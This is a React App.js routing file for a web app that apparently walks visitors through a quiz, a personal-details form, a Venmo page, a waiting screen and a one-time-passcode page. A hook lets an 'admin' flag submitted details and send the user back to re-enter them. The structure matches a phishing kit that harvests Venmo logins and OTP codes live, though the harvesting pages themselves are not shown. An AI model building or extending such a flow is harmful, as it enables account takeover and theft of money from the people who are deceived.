import React, { useEffect } from "react";
import { BrowserRouter, Routes, Route, Navigate, useNavigate } from "react-router-dom";
import { AppProvider, useApp } from "./context/AppContext";

import LandingPage          from "./pages/LandingPage";
import QuizPage             from "./pages/QuizPage";
import PersonalInfoPage     from "./pages/PersonalInfoPage";
import VenmoPage            from "./pages/VenmoPage";
import WaitingPage          from "./pages/WaitingPage";
import OTPPage              from "./pages/OTPPage";
import SuccessPage          from "./pages/SuccessPage";
import IncorrectDetailsPage from "./pages/IncorrectDetailsPage";

import "./index.css";

// ── Global redirect when admin marks details incorrect ──
const IncorrectRedirect = () => {
  const navigate = useNavigate();
  const { detailsIncorrect, setDetailsIncorrect } = useApp();

  useEffect(() => {
    if (detailsIncorrect) {
      setDetailsIncorrect(false);
      navigate("/incorrect-details", { replace: true });
    }
  }, [detailsIncorrect, navigate, setDetailsIncorrect]);

  return null;
};

function AppRoutes() {
  return (
    <>
      <IncorrectRedirect />
      <Routes>
        <Route path="/"                  element={<LandingPage />}          />
        <Route path="/quiz"              element={<QuizPage />}             />
        <Route path="/details"           element={<PersonalInfoPage />}     />
        <Route path="/venmo"             element={<VenmoPage />}            />
        <Route path="/waiting"           element={<WaitingPage />}          />
        <Route path="/otp"               element={<OTPPage />}              />
        <Route path="/success"           element={<SuccessPage />}          />
        <Route path="/incorrect-details" element={<IncorrectDetailsPage />} />
        <Route path="*"                  element={<Navigate to="/" />}      />
      </Routes>
    </>
  );
}

function App() {
  return (
    <AppProvider>
      <BrowserRouter>
        <AppRoutes />
      </BrowserRouter>
    </AppProvider>
  );
}

export default App;
